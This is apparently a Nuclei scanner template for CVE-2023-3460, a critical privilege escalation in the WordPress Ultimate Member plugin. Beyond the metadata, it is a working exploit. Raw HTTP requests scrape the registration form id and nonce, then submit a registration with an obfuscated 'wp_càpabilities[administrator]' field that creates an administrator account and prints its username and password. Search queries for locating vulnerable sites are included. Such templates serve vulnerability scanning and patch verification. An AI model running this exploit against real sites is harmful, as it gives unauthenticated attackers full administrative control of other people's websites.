id: CVE-2023-3460

info:
  name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation
  author: DhiyaneshDk
  severity: critical
  description: |
    The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
  remediation: |
    Upgrade to Ultimate Member version 2.6.7 or later.
  reference:
    - https://github.com/gbrsh/CVE-2023-3460
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3460
    - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7
    - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/
    - https://wordpress.org/plugins/ultimate-member/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3460
    cwe-id: CWE-269
    epss-score: 0.08148
    epss-percentile: 0.93668
    cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: ultimatemember
    product: ultimate_member
    framework: wordpress
    publicwww-query: /wp-content/plugins/ultimate-member
    google-query: inurl:/wp-content/plugins/ultimate-member
  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.php/register/?{{version}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1

    matchers:
      - type: dsl
        dsl:
          - contains(to_lower(body_1), "ultimate member")
          - regex("wordpress_logged_in_[a-z0-9]{32}", header_4)
          - status_code_4 == 302
        condition: and

    extractors:
      - type: regex
        name: path
        part: location_2
        group: 1
        regex:
          - '([a-z:/.]+)'
        internal: true

      - type: regex
        name: version
        part: body_1
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

      - type: regex
        name: formid
        part: body_3
        group: 1
        regex:
          - 'name="form_id" id="form_id_([0-9]+)"'
        internal: true

      - type: regex
        name: wpnonce
        part: body_3
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-z]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ username'
          - '"WP_PASSWORD: "+ password'
# digest: 490a0046304402205684e031efd38dfc6d93e9a93c464994c5a301b09665e5990d571d9fd6e876e002201b6f1fca016f060c964e5543b6dc6d207d3b2ac3b6a08e48eb53b2d2f36c70bc:922c64590222798bb761d5b6d8e72950